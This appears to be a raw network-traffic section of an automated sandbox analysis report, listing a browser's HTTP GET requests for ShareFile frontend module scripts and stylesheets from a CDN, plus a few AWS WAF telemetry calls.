Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-doc-gen-pilet/1.2.105/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-publisher-pilet/0.17.11/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-resourcegen-pilet/0.1.44/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-integrations-pilet/0.0.175/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-doc-gen-pilet/1.2.105/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-entitlements-pilet/0.1.54/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-package-pilet/0.37.26/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-entitlements-pilet/0.1.54/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-notification-center/0.11.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-notification-center/0.11.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-user-act-hist-pilet/1.7.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-publisher-pilet/0.17.11/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-billing-pilet/0.1.121/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-publisher-pilet/0.17.11/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-tenant-mgt-pilet/1.2.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-integrations-pilet/0.0.175/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-integrations-pilet/0.0.175/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-resourcegen-pilet/0.1.44/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-resourcegen-pilet/0.1.44/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-package-pilet/0.37.26/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-package-pilet/0.37.26/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-identity-pilet/1.0.24/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-permissions-pilet/1.118.39/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-rubicon-pilet/0.33.5/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-user-act-hist-pilet/1.7.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-user-act-hist-pilet/1.7.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-billing-pilet/0.1.121/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-client-pilet/0.10.6/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-billing-pilet/0.1.121/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-tenant-mgt-pilet/1.2.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-tenant-mgt-pilet/1.2.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-identity-pilet/1.0.24/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-identity-pilet/1.0.24/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-rubicon-pilet/0.33.5/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-rubicon-pilet/0.33.5/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /0093b71e39a6/478ed03bbf12/telemetry HTTP/1.1Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-client-dashboard/0.181.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-client-pilet/0.10.6/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-client-pilet/0.10.6/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-projects-pilet/2.1.15/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-view-engine-pilet/1.24.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-task-aggregator-pilet/1.0.23/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-storage-plugin-pilet/1.2.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /0093b71e39a6/478ed03bbf12/telemetry HTTP/1.1Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-review-approval-pilet/0.27.6/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-client-dashboard/0.181.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
